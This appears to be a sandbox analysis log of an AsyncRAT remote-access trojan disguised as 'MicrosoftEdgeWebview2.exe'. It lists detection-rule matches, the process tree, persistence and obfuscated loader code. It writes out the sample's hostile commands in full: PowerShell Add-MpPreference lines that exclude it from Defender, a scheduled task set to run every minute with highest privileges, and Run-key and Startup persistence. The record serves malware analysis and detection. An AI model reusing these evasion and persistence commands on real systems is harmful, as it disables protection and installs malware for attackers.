Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 18_2_00007FFD9B6B12B9
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 18_2_00007FFD9B6B1C4D
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Code function: 20_2_00007FFD9B6C12B9
Source: MicrosoftEdgeWebview2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
  (the 0x00007FFD... addresses of the recorded code functions show the CLR JIT-compiled and ran the assembly as a 64-bit process on this x64 guest; 32BIT_MACHINE describes the PE header, not the runtime, so memory dumps and injection checks must target a 64-bit process)
Source: MicrosoftEdgeWebview2.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: MicrosoftEdgeWebview2.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftEdgeWebview2.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: MicrosoftEdgeWebview2.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: MicrosoftEdgeWebview2.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: MicrosoftEdgeWebview2.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/21@1/1
Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeMutant created: \Sessions\1\BaseNamedObjects\4HWCFGdQwjsOjyy9
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeJump to behavior
            Source: MicrosoftEdgeWebview2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: MicrosoftEdgeWebview2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: MicrosoftEdgeWebview2.exeVirustotal: Detection: 69%
            Source: MicrosoftEdgeWebview2.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile read: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeJump to behavior
            Source: unknown | Process created: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe"
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll, wbemcomn.dll, amsi.dll, avicap32.dll, msvfw32.dll, winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: MicrosoftEdgeWebview2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: MicrosoftEdgeWebview2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: MicrosoftEdgeWebview2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe, Messages.cs .Net Code: Memory
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: MicrosoftEdgeWebview2.exe.0.dr, Messages.cs .Net Code: Memory
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Code function: 0_2_00007FFD9B6D53FA push es; iretd 0_2_00007FFD9B6D5627
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Code function: 0_2_00007FFD9B6D3688 pushad ; ret 0_2_00007FFD9B6D36A1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Code function: 0_2_00007FFD9B6D06F0 push es; iretd 0_2_00007FFD9B6D5627
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B5CD2A5 pushad ; iretd 1_2_00007FFD9B5CD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B6E09CA push E95B2BD0h; ret 1_2_00007FFD9B6E09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B6E0943 push E95B2BD0h; ret 1_2_00007FFD9B6E09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7B2316 push 8B485F91h; iretd 1_2_00007FFD9B7B231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B5BD2A5 pushad ; iretd 4_2_00007FFD9B5BD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7A2316 push 8B485F92h; iretd 4_2_00007FFD9B7A231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B59D2A5 pushad ; iretd 7_2_00007FFD9B59D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B6BBAE8 push E85B38D7h; ret 7_2_00007FFD9B6BBAF9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7853EF push FFFFFFE1h; ret 7_2_00007FFD9B785624
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B786605 push FFFFFFE1h; ret 7_2_00007FFD9B78662C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B788A19 push FFFFFFE1h; ret 7_2_00007FFD9B788A3C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B78464D push FFFFFFE1h; ret 7_2_00007FFD9B78466C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B78858A push FFFFFFE1h; ret 7_2_00007FFD9B78858C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B786198 push FFFFFFE1h; ret 7_2_00007FFD9B7861B4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7859A9 push FFFFFFE1h; ret 7_2_00007FFD9B7859CC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B789BA2 push FFFFFFE1h; ret 7_2_00007FFD9B789BA4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7891C9 push FFFFFFE1h; ret 7_2_00007FFD9B7893F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B785FD9 push FFFFFFE1h; ret 7_2_00007FFD9B785FDC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7896F2 push FFFFFFE1h; ret 7_2_00007FFD9B7896F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B785EF5 push FFFFFFE1h; ret 7_2_00007FFD9B785F1C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B78892C push FFFFFFE1h; ret 7_2_00007FFD9B788944
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B789521 push FFFFFFE1h; ret 7_2_00007FFD9B789544
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B788F35 push FFFFFFE1h; ret 7_2_00007FFD9B788F5C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B785131 push FFFFFFE1h; ret 7_2_00007FFD9B785134
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B787342 push FFFFFFE1h; ret 7_2_00007FFD9B78736C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B787342 push FFFFFFE1h; ret 7_2_00007FFD9B7874F4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B784A63 push FFFFFFE1h; ret 7_2_00007FFD9B784BC4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B789CA2 push FFFFFFE1h; ret 7_2_00007FFD9B789CA4
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe File created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe

            Boot Survival

            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
